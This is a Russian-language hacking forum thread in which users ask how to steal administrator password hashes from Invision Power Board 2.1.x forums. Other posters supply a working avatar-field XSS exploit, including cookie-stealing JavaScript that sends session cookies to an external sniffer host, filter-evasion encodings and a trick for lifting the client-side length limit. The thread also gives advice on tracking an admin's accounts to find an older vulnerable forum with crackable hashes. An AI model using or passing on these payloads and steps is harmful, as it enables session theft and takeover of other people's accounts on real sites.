Вобшем как можно унать хэш на это версии движка,
помню можно было через "жалобу" но вот работает ли эта шняга на этой версии не знаю, знал бы не спрашивал.

помню можно было через "жалобу" но вот работает ли эта шняга на этой версии не знаю, знал бы не спрашивал.
а попробовать? не работает.

Xss баг через репорт в 2.1.5 исправлен, он для 2.1.4

Спасибо буду знать, а не подскажете как нибудь там можно сваравать хэш, может сплойт есть. Знаю что гугл рулит, но всё так преятней узнать от знающих людей. ПРобывал сам поискать чтоб хэш cтырить, но что то не выходит.

sexxx, никак, пока XSSбаги там не нашли.

Пока ничего такого нет. Версия ещё девственная. В смысле не поимел пока никто.
Можно через аватарку попробовать вроде бы. Но это только под Ie.

вместо пробелов в слове javascript надо поставить табулюцию. Работает под Ие и опера

j a v a s c r i p t:alert(/XSS/).jpg

Invision Power Board 2.1.5 до 2006-03-08 и версии до 2.1.x

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в модуле PM. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

P.S.: В инете искать пробовали?

вместо пробелов в слове javascript надо поставить табулюцию. Работает под Ие и опера

j a v a s c r i p t:alert(/XSS/).jpg

Работает спасибо :)))
а теперь после того как получил алерт что мне делать?
заранее спасибо

тебе ввобщем надо получить куки припомощи JavaScript.
вот пример:

<script>
img = new Image();
img.src = "http://адресс_снифера?"+document.cookie;
</script>

только теперь тебе это надо вставить в ту XSS. Скажу сразу что форум не воспринимает ",?,;, пробел. Тебе эти символы надо зашифровать с помощью http://ha.ckers.org/xss.html и немного до делать сам скрипт возможно =)

Вроде похоже на
http://forum.antichat.ru/thread15709.html

тебе ввобщем надо получить куки припомощи JavaScript.
вот пример:

<script>
img = new Image();
img.src = "http://адресс_снифера?"+document.cookie;
</script>

только теперь тебе это надо вставить в ту XSS. Скажу сразу что форум не воспринимает ",?,;, пробел. Тебе эти символы надо зашифровать с помощью http://ha.ckers.org/xss.html и немного до делать сам скрипт возможно =)

Не понял вместо
j a v a s c r i p t:alert(/XSS/).jpg

XSS вставить твой код? Тогда алерт заробает когда посетитель зайдет на ту страницу
???

Попробал вот это
j a v a s c r i p t:document.images[1].src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;.jpg

и вот что мне выдал
Sorry, dynamic pages in the [IMG] tags are not allowed

вместо знака вопроса пробавл вот это %3F затем &#x3F; и это ?

Там надо пропустить тебе через http://ha.ckers.org/xss.html вот эти символы:
" пробел ; ' + ?
возможно еще [ ]

XSS вставить твой код? Тогда алерт заробает когда посетитель зайдет на ту страницу
???
Хм... Ты не правильно меня понял... Я не имел ввиду вставить в алерт вместо слова XSS я имел вставить вместо алерта. Т.е. после слова javascript =)

Хмм.. Ну никак не удаётся протащить ? и ;

там хэши наскоко помню соленые так что толку от xss ...

Почитать внутренние форумы и личные мессаги. Ещё поиграться.

Ввобщем этой XSS был подвержен damagelab.org вот видео http://dreamshell.h16.ru/hack/damagelab.rar

Как я вижу ни кто куки и не стырил припомощи этой XSS. Эх... Вот готовый код для тырки кук:

[im*g]j a v a s c r i p t:x=document.cookie%3Bimg=new%20Image()%3Bimg.src= %27http://antichat.ru/cgi-bin/s.jpg%3F%27%2Bx/*.jpg*///.gif[/im*g]

пояснение:
1)вместо пробелов в слове javascript ставим табуляцию. 2)После img.src= убираем пробел.
3)Этот код пашет токо под ИЕ.
4)Убираем звездочки только с тегов и

ПС просьба репу добавлять CinerX, а не _CinerX

Для Ipb 2.1.5:
Заходим в профиль => смена аватары. Сохраняем страницу на винт редактируем, чтоб не было ограничений на ввод урла аватары. Ввобим код выши в поле грузить с урл и жмем сохранить аватару. Вот и все =)

ПС репу поднимаем CinerX, а не _CinerX

Sorry, that is not a valid file extension

У меня не получаеться ничего (((

и так тоже не получаеться
j a v a s c r i p t:document.images%5B1%5D.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27+document.cookie%3B.jpg

На портале не одна статья по xss.
Ищи.
------------
ой блин - а напостили то сколько
в таком случае мой ответ - движок что-то из твоего запроса фильтрует

Про xss на античате уже давно читал. Тут только как делать алерт обьясняют, а про сниффера нету. А алерт у меня есть.

Есть про сниффер. Пойду сейчас на локалке проверю предъявленные способы.

Всё работает на 2.1.5, если через аватару. Правда, там где я проверял была ещё одна защита от дурака (но неизобретательного дурака).

Всё работает на 2.1.5, если через аватару. Правда, там где я проверял была ещё одна защита от дурака (но неизобретательного дурака).
Изобретательных дураков не бывает. Изобретательный-не дурак. :)

Кстати вроде бы джордоновская Xss для 2.1.4 работает в этой версии.

Поцан просто не знал как с Xss быть воти отмазался.

Хм... Вот для тех кто пишет, что ни фига на работает:
http://dreamshell.h16.ru/hack/cookie_avatar_ipb.txt

Кстати вроде бы джордоновская Xss для 2.1.4 работает в этой версии.

А дай пожалуйста ссылку, попробую. А то через аватару всё же сильно палевно :(

Я дал уже!!!
Причём в ЭТОЙ теме!!!!!

Я и у меня тоже наконецто получилось ответ ищите в этой теме
Теперь такой вопрос встал как сделать чтобы а аватаре было картинка еще, чтобы никто не заподозрил?

Я уже задавал этот вопрос, ответ - никак, ссылка: http://forum.antichat.ru/thread17664.html

У меня есть сниффер установленный на локалхосте. Я его залил на хост где поддерживвает пхп. Так вот когда на ссылку нажимаешь то открываеться картинка. Но это все работает у меня только на локалхосте. А так когда я нажимаю на ссылку она закачывается. Незнаю может я через лису просматривал из за этого так. Хочу сказать что можно.

У меня есть сниффер установленный на локалхосте. Я его залил на хост где поддерживвает пхп. Так вот когда на ссылку нажимаешь то открываеться картинка. Но это все работает у меня только на локалхосте. А так когда я нажимаю на ссылку она закачывается. Незнаю может я через лису просматривал из за этого так. Хочу сказать что можно.
Ни чего не понял! Как же тогда она открывается как аватара, если она закачивается???

Все работает на ура :)!!!
Есть вопрос хеш получен но проблема его расшифровать , наверное он с солью. Как можно соль узнать??
И еще как можно попасть в админку?

Через Xss никак. Там соль.

Можно попробовать сделать следущее (Меня такой способ много раз выручал)
Если известна Аська админа Например 123456789
Идем в гугле или яндекс и пишем ICQ 123456789
Если ничего не получиться типа не найдет то
Можно Если зная мыло задать такойже запрос (Тока с мылом например admin@admin.ru)
Если уж ничего не получается то по нику хотяб. (Пишешь Профиль пользователя Его-Ник)
Если тебе в одном из перечисленных случаев повезет (вылезет профиль пользователя его ник итд итп) то попробуй отыскать бажный форум ipb 1.3 версии и попробуй из него вытащить hash который можно легко расшифровать... Возможно он подойдет от админки твоего форума.
Еще раз повторяю этот способ мне помогал очень много раз.

как понять поставить вместо пробелов табуляцию???

Скопировать с этого форума сплойт в блокнот. И везде где пробелы удалить их, а вместо них поставить табуляции!!!!

сорри ступил алерт прошёл

не проходит этот скрипт <script>
img = new Image();
img.src = "http://адресс_снифера?"+document.cookie;
</script>


форум http://no-links.com/

Ни чего не понял! Как же тогда она открывается как аватара, если она закачивается???
Я же объяснил что работает только почему то на локалке

не проходит этот скрипт <script>
img = new Image();
img.src = "http://адресс_снифера?"+document.cookie;
</script>


форум http://no-links.com/
Он полюбому не пройдет... Читай весь топик! И внимательней!

Он полюбому не пройдет... Читай весь топик! И внимательней!


<script>
img%20=%20new%20Image()%3B
img.src%20=%20%22http://адрес?%22%3F+document.cookie%3B
</script>

сорри, забыл перекодировать но и такое тож не прохордит

Этот код все равно не сработает. Т.к. ты не зашифровал еще много чего...

Вот мой рабочий
Если IPB 2.1.4 то вот:
http://dreamshell.h16.ru/hack/cookie_avatar_ipb.txt
Если IPB 2.1.5 то ставь как аватару, предварительно убрав [IMG]

эт как как аватару???

эт как как аватару???
Вот кино, как в аватару xss вставить:
http://rapidshare.de/files/19344213/ipb_2.1.5_avatar.rar.html

Вот кино, как в аватару xss вставить:
Ввобще-то я в этой теме уже выкладывал видео на примере DamageLab:
_http://dreamshell.h16.ru/hack/damagelab.rar

А как чтобы на снифер отсылало зделать, тамж ведь ограничение стоит на длину...

все просто...заходишь в свой профиль....--> сменить аватарку.....сохраняешь эту страницу у себя на компе....(файл сохранить как....)....открываешь эту страницу блокнотом....ближе к концу находишь надпись (по-русски) "Введите ссылку на файл Вашего аватара".....ниже видишь строчку.....maxLength=80.....вместо 80 делаешь 300, например, maxLength=300.....и сохраняешь файл....открываешь броузером и теперь у тебя стоит ограничение на 300 символов...

для прописи кода тебе хватит сполна....:)

А как чтобы на снифер отсылало зделать, тамж ведь ограничение стоит на длину...

Сообщение #19
http://forum.antichat.ru/threadnav17358-2-10.html

может вам еще и как сниффер написать? =d

Эта же Xss в аватаре работает и в Ipb 2.1.6 =)))

Здравствуйте,

Принцип работы Xss через аватар понял. Но возникло два вопроса:
1. Как правильно написать подходящий под конкретный форум Xss?
2. После получения алерта как дальше быть? То есть интересует написание снифера и запуск скрипта.
Буду рад, если поделитесь линками на статьи.
Спасибо

Вот очень хорошая статья от WJ...
http://forum.antichat.ru/threadnav11807-1-10-xss.html
Еще поищи на сайте\форуме ачата...

Чем она хорошая? Ничего интересного ...

давай для пущей радости и сниффер ;-)

Такой вопрос: сделал все с авой, получил хэш код, айди юзверя (вообшем вся инфа на снифере), далее что? =/

Эта же Xss в аватаре работает и в Ipb 2.1.6 =)))


че та не работает ;( , как проверял?

І у меня не пашет

Лол на счёт снифера, на главноё странице античата есть он.

Тока он не совсем рабочий, подписка - на мыло еще ни раз не пришло...
а через жалобу в 2,14 тоже не очень то получалось, то ли админы жалоб не читают

а если нет на форуме возможности залить авик по вебу?

Хочк сказать всем огромное спасибо! Работает!

А как защищаться от этого? (xss в аватаре)

Вопрос снимается !!!!

Засунул скрипт от CinerX ( за что ему решпект и уважуха ) в аватарку и форумняк проглотил сказав - " Спасибо что всунили снифер " !!!!

НО !!! Я взял и вставил просто адрес снифера в автвру и он тоже его проглотил, будет ли работать в таком случае сниффер ???

Мдя... не пашет снифер, точнее ничего толкового не вылавливает....

Graver
Если ты в аватару просто адрес снифера засунул, то не удивительно...

Нет, я скрипт прописал, всё как по инстркуции - отред. html и всунул скрипт.

И ещё , он только админские куки крадёт или всех юзверов ?

тебе ввобщем надо получить куки припомощи JavaScript.
вот пример:

<script>
img = new Image();
img.src = "http://адресс_снифера?"+document.cookie;
</script>

только теперь тебе это надо вставить в ту XSS. Скажу сразу что форум не воспринимает ",?,;, пробел. Тебе эти символы надо зашифровать с помощью http://ha.ckers.org/xss.html и немного до делать сам скрипт возможно =)


http://адресс_снифера? ---- откудовы взять ?

http://forum.antichat.ru/showpost.php?p=193807&postcount=1
поиск рулит, ога?